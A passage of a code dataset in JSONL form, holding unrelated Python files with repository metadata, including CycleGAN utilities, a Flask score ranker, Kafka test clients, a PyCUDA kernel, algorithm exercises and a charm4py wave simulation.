str(epoch).zfill(6))\n\n # make directory if it does not exist\n if not os.path.exists(checkpoint_dir):\n os.system('mkdir -p '+checkpoint_dir)\n\n # build up the file paths\n G_XtoY_path = os.path.join(checkpoint_dir, 'G_XtoY.pkl')\n G_YtoX_path = os.path.join(checkpoint_dir, 'G_YtoX.pkl')\n Dp_X_path = os.path.join(checkpoint_dir, 'Dp_X.pkl')\n Dp_Y_path = os.path.join(checkpoint_dir, 'Dp_Y.pkl')\n Dg_X_path = os.path.join(checkpoint_dir, 'Dg_X.pkl')\n Dg_Y_path = os.path.join(checkpoint_dir, 'Dg_Y.pkl')\n\n # save weights to file\n torch.save(G_XtoY.state_dict(), G_XtoY_path)\n torch.save(G_YtoX.state_dict(), G_YtoX_path)\n torch.save(Dp_X.state_dict(), Dp_X_path)\n torch.save(Dp_Y.state_dict(), Dp_Y_path)\n torch.save(Dg_X.state_dict(), Dg_X_path)\n torch.save(Dg_Y.state_dict(), Dg_Y_path)\n\ndef to_data(x):\n \"\"\"Converts variable to numpy.\"\"\"\n if torch.cuda.is_available():\n x = x.cpu()\n x = x.data.numpy()\n x = ((x + 0.5)*255.0).astype(np.uint8)\n return x\n\ndef save_samples(samples_dir, epoch, fixed_Y, fixed_X, G_YtoX, G_XtoY, batch_size=16):\n \"\"\"Saves samples from both generators X->Y and Y->X.\"\"\"\n if not os.path.exists(samples_dir):\n os.system('mkdir -p '+samples_dir)\n # move input data to correct device\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # X->Y->Reconstructed X\n fake_Y = G_XtoY(fixed_X.to(device))\n recon_Y_X = G_YtoX(fake_Y.to(device))\n\n # Y->X->Reconstructed Y\n fake_X = G_YtoX(fixed_Y.to(device))\n recon_X_Y = G_XtoY(fake_X.to(device))\n \n # get data in numpy format\n X, fake_Y, recon_Y_X = to_data(fixed_X), to_data(fake_Y), to_data(recon_Y_X)\n Y, fake_X, recon_X_Y = to_data(fixed_Y), to_data(fake_X), to_data(recon_X_Y)\n\n # matplotlib plot\n n_rows = min(4, batch_size)\n # plt.figure(figsize=(20,16))\n plt.figure(figsize=(16,8))\n plt.xticks([])\n plt.yticks([])\n plt.tight_layout()\n\n for i in range(min(n_rows, batch_size)):\n plt.subplot(n_rows*2,1,i*2+1)\n plt.title('Original Image X | Translated Image | Reconstructed Image', fontsize=16, fontweight=\"bold\")\n img_concat = cv2.hconcat([np.transpose(X[i,:,:,:], (1, 2, 0)), \n np.transpose(fake_Y[i,:,:,:], (1, 2, 0)), \n np.transpose(recon_Y_X[i,:,:,:], (1, 2, 0))])\n plt.imshow(img_concat)\n\n plt.subplot(n_rows*2,1,i*2+2)\n plt.title('Original Image Y | Translated Image | Reconstructed Image', fontsize=16, fontweight=\"bold\")\n img_concat = cv2.hconcat([np.transpose(Y[i,:,:,:], (1, 2, 0)), \n np.transpose(fake_X[i,:,:,:], (1, 2, 0)), \n np.transpose(recon_X_Y[i,:,:,:], (1, 2, 0))])\n plt.imshow(img_concat)\n\n # save the sampled results to file\n path = os.path.join(samples_dir, 'sample-{:06d}.png'.format(epoch))\n plt.savefig(path)\n plt.close()","repo_name":"towardsautonomy/CycleGAN_improved","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"85"} +{"seq_id":"6833950002","text":"from flask import Flask, render_template, request\nimport random\nimport statistics\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/rank', methods=['POST'])\ndef rank():\n \n #get scores of ppl in class\n num_people = int(request.form['number_people'])\n score = int(request.form['score'])\n #arrange scores in list in descending order\n random.seed(1)\n score_list = random.sample(range(1, 100), num_people)\n score_list.sort(reverse=True)\n #score and placing\n if score in 
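# --- Illustrative sketch (not part of the checkpoint helper record above) ---
# Restoring one of the generators saved by that helper: it writes plain state dicts,
# so loading is torch.load + load_state_dict. The network class, its constructor
# arguments and the checkpoint directory are assumptions for the demo.
import os
import torch

def load_generator(checkpoint_dir, generator, name='G_XtoY.pkl', epoch='best'):
    sub_dir = epoch if epoch == 'best' else str(epoch).zfill(6)
    path = os.path.join(checkpoint_dir, sub_dir, name)
    state_dict = torch.load(path, map_location='cpu')   # weights were saved as state dicts
    generator.load_state_dict(state_dict)
    generator.eval()
    return generator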
score_list:\n rank = score_list.index(score) + 1\n result = f'The placing of your score within your class is #{rank}'\n else:\n result = 'You are not in this class '\n\n #calculator of stats\n mean_score = int(statistics.mean(score_list))\n median_score = int(statistics.median(score_list))\n mode_score = int(statistics.mode(score_list))\n stdev_score = int(statistics.stdev(score_list))\n \n return render_template('result.html', result=result, score_list=score_list, mean_score=mean_score, median_score=median_score, mode_score=mode_score, stdev_score=stdev_score)\n\napp.run(host='0.0.0.0', port=81)\n","repo_name":"Ruxi00/savetheworld1__","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33091273857","text":"from django.conf.urls import patterns, include, url\nimport dream\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'sharetools.views.home', name='home'),\n # url(r'^sharetools/', include('sharetools.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n\n url(r'^[/]?$',dream.Index,name='dream.index'),\n url(r'^detail/(?P.+?)/$',dream.Detail,name='dream.detail'),\n url(r'^search/$',dream.Search,name='dream.search'),\n url(r'^cat/(?P.+?)/$',dream.Cat,name='dream.cat'),\n\n)\n","repo_name":"iazxq/sharetools","sub_path":"app/views/jiemeng/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26560879225","text":"from pyfancy import pyfancy\nimport recommender as recom\n\ndef getAllocations(client_portfolio, allSecurities, text = True):\n \n stocks_alloc, bonds_alloc = client_portfolio.current_asset_allocation(allSecurities)\n recommended_stock_alloc, recommended_bonds_alloc = client_portfolio.recommended_asset_allocation(client_portfolio.client['Risk_profile'])\n \n if text:\n pyfancy.pyfancy().cyan(\"Current allocation: {} stocks and {} bonds \\n\".format(stocks_alloc, bonds_alloc)).output()\n pyfancy.pyfancy().cyan(\"Recommended allocation: {} stocks and {} bonds \\n\".format(recommended_stock_alloc, recommended_bonds_alloc)).output()\n \n return stocks_alloc, bonds_alloc, recommended_stock_alloc, recommended_bonds_alloc\n \n \ndef refine_exposure_to_5 (client_portfolio, allSecurities, preferences):\n stocks_alloc, bonds_alloc, recommended_stock_alloc, recommended_bonds_alloc = getAllocations(client_portfolio, allSecurities, False)\n pyfancy.pyfancy().cyan(\"Started exposure refining... 
\\n\").output()\n for key, exposure in client_portfolio.portfolio.items():\n if (key != 'nan'):\n if exposure > 5:\n client_portfolio.setExposure(key, 5)\n elif (key == 'nan'):\n break\n return client_portfolio.portfolio","repo_name":"rucsa/thesis_benchmark_advisor","sub_path":"advisor7/refine_exposure_to_5.py","file_name":"refine_exposure_to_5.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"24487863170","text":"import pycuda.driver as cuda\nimport pycuda.autoinit\nfrom pycuda.compiler import SourceModule\n\nimport numpy as np\n\nmod = SourceModule(\"\"\"\n__global__ void sum2arrays(float *a, float *b, float *c,int N)\n{\n int idx = blockIdx.x * blockDim.x + threadIdx.x;\n if (idx Coroutine:\n topic, _ = TopicManager.get_or_create(topic_name)\n timestamp_ms = timestamp_ms or datetime.now().timestamp()\n total_partition_events = topic.offset(partition=partition)\n partition = partition or 0\n\n consumer_record = ConsumerRecord(\n topic=topic_name,\n value=value,\n key=key,\n headers=headers,\n partition=partition,\n timestamp=timestamp_ms,\n offset=total_partition_events + 1,\n timestamp_type=None,\n checksum=None,\n serialized_key_size=None,\n serialized_value_size=None,\n )\n\n await topic.put(consumer_record)\n\n async def fut():\n return RecordMetadata(\n topic=topic_name,\n partition=partition,\n timestamp=timestamp_ms,\n offset=total_partition_events + 1,\n )\n\n return fut()\n\n\nclass TestConsumer(Base, Consumer):\n __test__ = False\n\n def __init__(self, group_id: Optional[str] = None, **kwargs) -> None:\n # copy the aiokafka behavior\n self.topics: Optional[Tuple[str]] = None\n self._group_id: Optional[str] = group_id\n self._assignment: List[TopicPartition] = []\n self._previous_topic: Optional[Topic] = None\n self.partitions_committed: Dict[TopicPartition, int] = {}\n\n # Called to make sure that has all the kafka attributes like _coordinator\n # so it will behave like an real Kafka Consumer\n super().__init__()\n\n def subscribe(\n self,\n *,\n topics: Tuple[str],\n listener: RebalanceListener,\n **kwargs,\n ) -> None:\n self.topics = topics\n\n for topic_name in topics:\n topic, created = TopicManager.get_or_create(topic_name, consumer=self)\n\n if not created:\n # It means that the topic already exist, so we are in\n # the situation where the topic hs events and the Stream\n # was added on runtime\n topic.consumer = self\n\n for partition_number in range(0, 3):\n self._assignment.append(\n TopicPartition(topic=topic_name, partition=partition_number)\n )\n\n if listener.stream is not None:\n listener.stream.seek_to_initial_offsets()\n\n def assignment(self) -> List[TopicPartition]:\n return self._assignment\n\n def _check_partition_assignments(self, consumer_record: ConsumerRecord) -> None:\n \"\"\"\n When an event is consumed the partition can be any positive int number\n because there is not limit in the producer side (only during testing of course).\n In case that the partition is not in the `_assignment` we need to register it.\n\n This is only during testing as in real use cases the assignments happens\n at the moment of kafka bootstrapping\n \"\"\"\n topic_partition = TopicPartition(\n topic=consumer_record.topic,\n partition=consumer_record.partition,\n )\n\n if topic_partition not in self._assignment:\n self._assignment.append(topic_partition)\n\n def last_stable_offset(self, topic_partition: TopicPartition) -> int:\n topic = 
TopicManager.get(topic_partition.topic)\n\n if topic is not None:\n return topic.offset(partition=topic_partition.partition)\n return -1\n\n async def position(self, topic_partition: TopicPartition) -> int:\n \"\"\"\n Get the offset of the *next record* that will be fetched,\n so it returns offset(topic_partition) + 1\n \"\"\"\n return self.last_stable_offset(topic_partition) + 1\n\n def highwater(self, topic_partition: TopicPartition) -> int:\n \"\"\"\n A highwater offset is the offset that will be assigned to\n the *next message* that is produced, so it returns\n offset(topic_partition) + 1\n \"\"\"\n return self.last_stable_offset(topic_partition) + 1\n\n async def commit(self, offsets: Optional[Dict[TopicPartition, int]] = None) -> None:\n if offsets is not None:\n for topic_partition, offset in offsets.items():\n self.partitions_committed[topic_partition] = offset\n return None\n\n async def committed(self, topic_partition: TopicPartition) -> Optional[int]:\n return self.partitions_committed.get(topic_partition, 0)\n\n async def end_offsets(\n self, partitions: List[TopicPartition]\n ) -> Dict[TopicPartition, int]:\n topic = TopicManager.get(partitions[0].topic)\n end_offsets = {\n topic_partition: topic.offset(partition=topic_partition.partition) + 1\n for topic_partition in partitions\n }\n return end_offsets\n\n def partitions_for_topic(self, topic: str) -> Set:\n \"\"\"\n Return the partitions of all assigned topics. The `topic` argument is not used\n because in a testing enviroment the only topics are the ones declared by the end\n user.\n\n The AIOKafkaConsumer returns a Set, so we do the same.\n \"\"\"\n partitions = [topic_partition.partition for topic_partition in self._assignment]\n return set(partitions)\n\n async def getone(\n self,\n ) -> Optional[ConsumerRecord]: # The return type must be fixed later on\n if self._previous_topic:\n # Assumes previous record retrieved through getone was completed\n self._previous_topic.task_done()\n self._previous_topic = None\n\n topic = None\n for topic_partition in self._assignment:\n topic = TopicManager.get(topic_partition.topic)\n\n if not topic.consumed:\n break\n\n if topic is not None:\n consumer_record = await topic.get()\n self._check_partition_assignments(consumer_record)\n self._previous_topic = topic\n return consumer_record\n\n return None\n\n def seek(self, *, partition: TopicPartition, offset: int) -> None:\n # This method intends to have the same signature as aiokafka but with kwargs\n # rather than positional arguments\n topics = self.topics or ()\n\n if partition.topic in topics:\n topic = TopicManager.get(name=partition.topic)\n partition_offset = topic.offset(partition=partition.partition)\n\n # only consume if the offset to seek if <= the parition total events\n if offset <= partition_offset:\n consumed_events = 0\n\n # keep consuming if the events to consume <= offset to seek\n while consumed_events < offset:\n event = topic.get_nowait()\n topic.task_done()\n\n if event.partition == partition.partition:\n # only decrease if the event.partition matches\n # the partition that the user wants to seek\n consumed_events += 1\n else:\n # ideally each partition should be a Queue\n # for now just add the same event to the queue\n topic.put_nowait(event=event)\n\n # it means that this consumer can consume\n # from the TopicPartition so we can add it\n # to the _assignment\n if partition not in self._assignment:\n 
self._assignment.append(partition)\n","repo_name":"kpn/kstreams","sub_path":"kstreams/test_utils/test_clients.py","file_name":"test_clients.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"85"} +{"seq_id":"2220739784","text":"def vueltasProgDin(listaValoresMonedas,vueltas,minMonedas,monedasUsadas):\r\n for centavos in range(vueltas+1):\r\n conteoMonedas = centavos\r\n nuevaMoneda = 1\r\n #En este ciclo consideramos el uso de todas las monedas posibles para\r\n #dar las vueltas por la cantidad especificada por centavos\r\n for j in [m for m in listaValoresMonedas if m <= centavos]:\r\n if minMonedas[centavos-j] + 1 < conteoMonedas:\r\n conteoMonedas = minMonedas[centavos-j]+1\r\n nuevaMoneda = j\r\n minMonedas[centavos] = conteoMonedas\r\n monedasUsadas[centavos] = nuevaMoneda\r\n return minMonedas[vueltas]\r\n\r\ndef imprimirMonedas(monedasUsadas,vueltas):\r\n moneda = vueltas\r\n while moneda > 0:\r\n estaMoneda = monedasUsadas[moneda]\r\n print(estaMoneda)\r\n moneda = moneda - estaMoneda\r\n\r\ndef main():\r\n #Las dos primeras líneas de main fijan la cantidad a convertir y\r\n #crean la lista de monedas usadas.\r\n cantidad = 63\r\n listaM = [1,5,10,21,25]\r\n#líneas siguientes crean las listas que necesitamos para almacenar los resultados. \r\n monedasUsadas = [0]*(cantidad+1)\r\n#es el conteo de monedas usadas para dar el valor correspondiente a la posicion de la lista\r\n conteoMonedas = [0]*(cantidad+1)\r\n\r\n print(\"Dar unas vueltas de\",cantidad,\"centavos requiere\")\r\n print(vueltasProgDin(listaM,cantidad,conteoMonedas,monedasUsadas),\"monedas\")\r\n print(\"Tales monedas son:\")\r\n imprimirMonedas(monedasUsadas,cantidad)\r\n print(\"La lista usada es la siguiente:\")\r\n print(monedasUsadas)\r\n\r\nmain()\r\n","repo_name":"valeqdelc/resolver-problemas-mediante-busquedas","sub_path":"ejemplo2.py","file_name":"ejemplo2.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3976257925","text":"import logging\nfrom pathlib import Path\n\nfrom stactools.sentinel5p import stac\n\n# import shutil\n\n\nlogging.basicConfig(level=0)\nlogging.getLogger(\"fsspec\").propagate = False\n\nroot = Path(__file__).parents[1]\nexamples = root / \"examples\"\ndata_files = root / \"tests\" / \"data-files\"\n\n# if examples.exists():\n# shutil.rmtree(examples)\n\n# examples.mkdir()\n\nfor path in data_files.glob(\"*.nc\"):\n item = stac.create_item(str(path))\n item.set_self_href(str(examples / item.id) + \".json\")\n item.make_asset_hrefs_relative()\n item.save_object(include_self_link=False)\n","repo_name":"stactools-packages/sentinel5p","sub_path":"scripts/create_examples.py","file_name":"create_examples.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"69954176597","text":"#\n# @lc app=leetcode.cn id=236 lang=python3\n#\n# [236] 二叉树的最近公共祖先\n#\n# https://leetcode-cn.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (60.97%)\n# Likes: 574\n# Dislikes: 0\n# Total Accepted: 84.6K\n# Total Submissions: 132.7K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# 给定一个二叉树, 找到该树中两个指定节点的最近公共祖先。\n#\n# 百度百科中最近公共祖先的定义为:“对于有根树 T 的两个结点 p、q,最近公共祖先表示为一个结点 x,满足 x 是 p、q 的祖先且 x\n# 的深度尽可能大(一个节点也可以是它自己的祖先)。”\n#\n# 例如,给定如下二叉树:  root = 
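# --- Illustrative sketch (not part of the coin-change record above) ---
# The same dynamic program, trimmed down, plus the worked example that record prints:
# 63 cents with denominations [1, 5, 10, 21, 25] needs 3 coins (21 + 21 + 21),
# whereas a greedy 25 + 25 + 10 + 1 + 1 + 1 answer would need 6.
def min_coins(denoms, amount):
    best = list(range(amount + 1))            # upper bound: all pennies
    used = [1] * (amount + 1)
    for cents in range(1, amount + 1):
        for coin in (d for d in denoms if d <= cents):
            if best[cents - coin] + 1 < best[cents]:
                best[cents] = best[cents - coin] + 1
                used[cents] = coin
    coins, c = [], amount
    while c > 0:                              # walk back through the choices made
        coins.append(used[c])
        c -= used[c]
    return best[amount], coins

assert min_coins([1, 5, 10, 21, 25], 63) == (3, [21, 21, 21])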
[3,5,1,6,2,0,8,null,null,7,4]\n#\n#\n#\n#\n#\n# 示例 1:\n#\n# 输入: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# 输出: 3\n# 解释: 节点 5 和节点 1 的最近公共祖先是节点 3。\n#\n#\n# 示例 2:\n#\n# 输入: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# 输出: 5\n# 解释: 节点 5 和节点 4 的最近公共祖先是节点 5。因为根据定义最近公共祖先节点可以为节点本身。\n#\n#\n#\n#\n# 说明:\n#\n#\n# 所有节点的值都是唯一的。\n# p、q 为不同节点且均存在于给定的二叉树中。\n#\n#\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n if not root:\n return None\n if not p:\n return q\n if not q:\n return p\n\n stack = [root] # 遍历\n paths = [[root]]\n findp = False\n findq = False\n pathp = None\n pathq = None\n while stack:\n if findp and findq:\n break\n node = stack.pop()\n path = paths.pop()\n # 处理\n if node == p:\n findp = True\n pathp = path+[node]\n if node == q:\n findq = True\n pathq = path+[node]\n\n # 遍历\n if node.right:\n stack.append(node.right)\n paths.append(path+[node.right])\n if node.left:\n stack.append(node.left)\n paths.append(path+[node.left])\n\n c = None\n while True:\n if pathp[0] == pathq[0]:\n c = pathp.pop(0)\n pathq.pop(0)\n else:\n break\n return c\n # @lc code=end\n","repo_name":"kangkang59812/LeetCode-python","sub_path":"236.二叉树的最近公共祖先.py","file_name":"236.二叉树的最近公共祖先.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28738735501","text":"\n# This program solves the 2-d wave equation over a grid, displaying pretty results.\n# See README.rst for more information.\n\nfrom charm4py import charm, Chare, Array, coro, Channel, Future\nimport time\nimport math\nimport numpy as np\nimport numba\nimport random\ntry:\n import tkinter\n from PIL import Image, ImageTk, ImageDraw\nexcept ImportError:\n import sys\n sys.argv += ['--NO-RENDER']\n\n\nIMAGE_WIDTH, IMAGE_HEIGHT = 800, 699\nCHARE_ARRAY_WIDTH, CHARE_ARRAY_HEIGHT = 4, 3\nNUM_ITERATIONS = 3000\nNUM_INITIAL_PERTURBATIONS = 5\nLEFT, RIGHT, UP, DOWN = range(4)\nMAX_FRAMERATE = 60 # in frames per second. 
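# --- Illustrative sketch (not part of the LCA record above) ---
# The usual recursive formulation of the same problem, shown as a compact
# alternative to collecting root-to-node paths first: a node is the LCA when
# p and q turn up in different subtrees (or it is p or q itself).
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

def lowest_common_ancestor(root, p, q):
    if root is None or root is p or root is q:
        return root
    left = lowest_common_ancestor(root.left, p, q)
    right = lowest_common_ancestor(root.right, p, q)
    if left and right:          # p and q sit in different subtrees -> root is the LCA
        return root
    return left or right        # otherwise both are on one side (or below p/q itself)

# tiny check on the tree [3, 5, 1]
root, five, one = TreeNode(3), TreeNode(5), TreeNode(1)
root.left, root.right = five, one
assert lowest_common_ancestor(root, five, one) is root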
set -1 for unlimited\n\n\nclass Main(Chare):\n\n def __init__(self, args):\n self.RENDER = True\n try:\n args.remove('--NO-RENDER')\n self.RENDER = False\n except ValueError:\n pass\n\n print('\\nUsage: wave2d.py [num_iterations] [max_framerate])')\n global NUM_ITERATIONS, MAX_FRAMERATE\n if len(args) > 1:\n NUM_ITERATIONS = int(args[1])\n if len(args) > 2:\n MAX_FRAMERATE = int(args[2])\n\n print('Running wave2d on', charm.numPes(), 'processors for', NUM_ITERATIONS, 'iterations')\n print('Max framerate is', MAX_FRAMERATE, 'frames per second')\n\n self.count = 0 # tracks from how many workers I have received a subimage for this iteration\n programStartTime = frameStartTime = time.time()\n\n # Create new 2D array of worker chares\n array = Array(Wave, (CHARE_ARRAY_WIDTH, CHARE_ARRAY_HEIGHT))\n # tell all the worker chares to start the simulation\n array.work(self.thisProxy)\n\n if self.RENDER:\n tk = tkinter.Tk()\n self.frame = Image.new('RGB', (IMAGE_WIDTH, IMAGE_HEIGHT))\n img = ImageTk.PhotoImage(self.frame)\n label_image = tkinter.Label(tk, image=img)\n label_image.pack()\n\n self.frameReady = Future()\n for i in range(NUM_ITERATIONS):\n self.frameReady.get() # wait for the next frame\n if MAX_FRAMERATE > 0:\n elapsed = time.time() - frameStartTime\n if elapsed < 1/MAX_FRAMERATE:\n # enforce framerate\n charm.sleep(1/MAX_FRAMERATE - elapsed)\n if self.RENDER:\n fps = round(1/(time.time() - frameStartTime))\n # draw frames per second value on image\n d = ImageDraw.Draw(self.frame)\n d.text((10,10), str(fps) + ' fps', fill=(0,0,0,255))\n img = ImageTk.PhotoImage(self.frame)\n label_image.configure(image=img)\n label_image.image = img\n tk.update_idletasks()\n tk.update()\n\n # loop simulation every 1000 iterations\n reset = (i % 1000 == 0)\n frameStartTime = time.time()\n array.resume(reset) # tell workers to resume\n self.frameReady = Future()\n\n print('Program Done!, Total time=', time.time() - programStartTime)\n exit()\n\n # every worker calls this method to deposit their subimage\n def depositSubImage(self, data, pos, img_size):\n self.count += 1\n if self.RENDER:\n self.frame.paste(Image.frombytes('RGB', img_size, data), box=pos)\n if self.count == CHARE_ARRAY_WIDTH * CHARE_ARRAY_HEIGHT:\n # received image data from all chares\n self.count = 0\n self.frameReady() # signal main that the next frame is ready\n\n\nclass Wave(Chare):\n\n def setInitialConditions(self):\n # setup some initial pressure pertubations for timesteps t-1 and t\n self.pressure_new = np.zeros((self.myheight, self.mywidth)) # time t+1\n self.pressure = np.zeros((self.myheight, self.mywidth)) # time t\n self.pressure_old = np.zeros((self.myheight, self.mywidth)) # time t-1\n init_pressure(NUM_INITIAL_PERTURBATIONS, IMAGE_WIDTH, IMAGE_HEIGHT,\n self.mywidth, self.myheight, self.thisIndex,\n self.pressure, self.pressure_old)\n\n def resume(self, reset=False):\n self.resumeFuture(reset)\n\n @coro\n def work(self, mainProxy):\n \"\"\" this is the main simulation loop for each chare \"\"\"\n\n # size of my rectangular portion of the image\n self.mywidth = IMAGE_WIDTH // CHARE_ARRAY_WIDTH\n self.myheight = IMAGE_HEIGHT // CHARE_ARRAY_HEIGHT\n self.setInitialConditions()\n\n i = self.thisIndex\n X, Y = CHARE_ARRAY_WIDTH, CHARE_ARRAY_HEIGHT\n # establish a Channel with neighbor chares in the 2D grid\n left = Channel(self, remote=self.thisProxy[(i[0]-1)%X, i[1]])\n right = Channel(self, remote=self.thisProxy[(i[0]+1)%X, i[1]])\n top = Channel(self, remote=self.thisProxy[i[0], (i[1]-1)%Y])\n bottom = Channel(self, 
remote=self.thisProxy[i[0], (i[1]+1)%Y])\n\n width, height = self.mywidth, self.myheight\n # coordinate where my portion of the image is located\n sx = self.thisIndex[0] * width\n sy = self.thisIndex[1] * height\n # data will store my portion of the image\n data = np.zeros(width*height*3, dtype=np.uint8)\n buffers = [None] * 4\n\n # run simulation now\n while True:\n top_edge = self.pressure[[0],:].reshape(width)\n bottom_edge = self.pressure[[-1],:].reshape(width)\n left_edge = self.pressure[:,[0]].reshape(height)\n right_edge = self.pressure[:,[-1]].reshape(height)\n\n # send ghost values to neighbors\n left.send(RIGHT, left_edge)\n right.send(LEFT, right_edge)\n bottom.send(UP, bottom_edge)\n top.send(DOWN, top_edge)\n\n # receive ghost values from neighbors. iawait iteratively yields\n # channels as they become ready (have data to receive)\n for channel in charm.iwait((left, right, bottom, top)):\n side, ghost_values = channel.recv()\n buffers[side] = ghost_values\n\n check_and_compute(height, width,\n buffers[LEFT], buffers[RIGHT], buffers[UP], buffers[DOWN],\n self.pressure, self.pressure_old, self.pressure_new)\n\n # advance to next step by shifting the data back one step in time\n self.pressure_old, self.pressure, self.pressure_new = self.pressure, self.pressure_new, self.pressure_old\n\n # draw my part of the image, plus a nice 1 pixel border along my\n # right/bottom boundary\n fill_subimage(data, width, height, self.pressure)\n # provide my portion of the image to the mainchare\n mainProxy.depositSubImage(data, (sx, sy), (width, height))\n # wait for message from mainchare to resume simulation\n self.resumeFuture = Future()\n reset = self.resumeFuture.get()\n if reset:\n self.setInitialConditions()\n\n\n@numba.jit(nopython=True, cache=False)\ndef check_and_compute(h, w, left, right, up, down,\n pressure, pressure_old, pressure_new):\n for i in range(h):\n for j in range(w):\n # current time's pressures for neighboring array locations\n if j == 0: L = left[i]\n else: L = pressure[i,j-1]\n\n if j == w-1: R = right[i]\n else: R = pressure[i,j+1]\n\n if i == 0: U = up[j]\n else: U = pressure[i-1,j]\n\n if i == h-1: D = down[j]\n else: D = pressure[i+1,j]\n\n # current time's pressure for this array location\n curr = pressure[i,j]\n\n # previous time's pressure for this array location\n old = pressure_old[i,j]\n\n # compute the future time's pressure for this array location\n pressure_new[i,j] = 0.4*0.4*(L+R+U+D - 4.0*curr)-old+2.0*curr\n\n\n@numba.jit(nopython=True, cache=False)\ndef fill_subimage(data, w, h, pressure):\n # set the output pixel values for my rectangle\n # Each RGB component is a uint8 that can have 256 possible values\n for i in range(h):\n for j in range(w):\n p = int(pressure[i,j])\n if p > 255: p = 255 # Keep values in valid range\n if p < -255: p = -255 # Keep values in valid range\n pos = 3*(i*w+j)\n if p > 0: # Positive values are red\n data[pos:pos+3] = (255, 255-p, 255-p)\n else: # Negative values are blue\n data[pos:pos+3] = (255+p, 255+p, 255)\n\n # Draw a green border on right and bottom of this chare array's pixel buffer.\n # This will overwrite some pressure values at these pixels.\n for i in range(h):\n pos = 3*(i*w+w-1)\n data[pos:pos+3] = (0, 255, 0)\n for i in range(w):\n pos = 3*((h-1)*w+i)\n data[pos:pos+3] = (0, 255, 0)\n\n\n@numba.jit(nopython=True, cache=False)\ndef init_pressure(numInitialPerturbations, W, H, w, h, elemIdx, pressure, pressure_old):\n # force the same random numbers to be used for each chare array element\n random.seed(6)\n for 
s in range(numInitialPerturbations):\n # determine where to place a circle within the interior of the 2D domain\n radius = 20 + random.randint(0,32767) % 30\n xcenter = radius + random.randint(0,32767) % (W - 2*radius)\n ycenter = radius + random.randint(0,32767) % (H - 2*radius)\n # draw the circle\n for i in range(h):\n for j in range(w):\n # the coordinate in the global data array (not just in this chare's portion)\n globalx = elemIdx[0]*w + j\n globaly = elemIdx[1]*h + i\n distanceToCenter = math.sqrt((globalx-xcenter)**2 + (globaly-ycenter)**2)\n if distanceToCenter < radius:\n rscaled = (distanceToCenter/radius)*3.0*3.14159/2.0 # ranges from 0 to 3pi/2\n t = 700.0 * math.cos(rscaled) # range won't exceed -700 to 700\n pressure[i,j] = pressure_old[i,j] = t\n\n\ncharm.start(Main)\n","repo_name":"UIUC-PPL/charm4py","sub_path":"examples/wave2d/wave2d.py","file_name":"wave2d.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":281,"dataset":"github-code","pt":"85"} +{"seq_id":"9681979334","text":"# To rearrange a sorted array in the max min form.\n# for e.g. given_array = [1,2,3,4,5,6,7,8,9]\n# answer_array = [9,1,8,2,7,3,6,4,5]\n\ndef Convert_to_max_min(arr, n):\n temp_arr = []\n\n # to denote the begining of the array\n start = 0\n\n # to denote the end of the array\n end = n-1\n\n max = True\n while start <= end:\n if max:\n temp_arr.append(arr[end])\n end -=1\n max = False\n else:\n temp_arr.append(arr[start])\n start +=1\n max = True\n\n return temp_arr\n\n# Code to run the program\narr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nn = len(arr)\nprint(\"Given Array\")\nprint(arr)\nprint(\"Answer Array\")\nprint(Convert_to_max_min(arr, n))","repo_name":"kalrashivam/python_algorithms","sub_path":"Rearrange_sorted_array_to_max_min_form.py","file_name":"Rearrange_sorted_array_to_max_min_form.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16029050400","text":"\"\"\"\n=====================================================\nGeração de sensibilidades de mercado no sistema.dat\n=====================================================\n\"\"\"\n\n\n# %%\n# Para realizar a análise do sistema.dat, será utilizado o módulo plotly\nfrom datetime import datetime\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.io as pio\n\npio.templates.default = \"ggplot2\"\n\n\n# %%\n# O sistema.dat é o arquivo de entrada do modelo NEWAVE que contém informações\n# sobre os submercados de energia. Em particular, são definidos os submercados\n# e as curvas de mercado de energia esperado por estágio, para cada um.\n# É uma análise comum a análise de sensibilidades em relação ao mercado de energia\n# e à 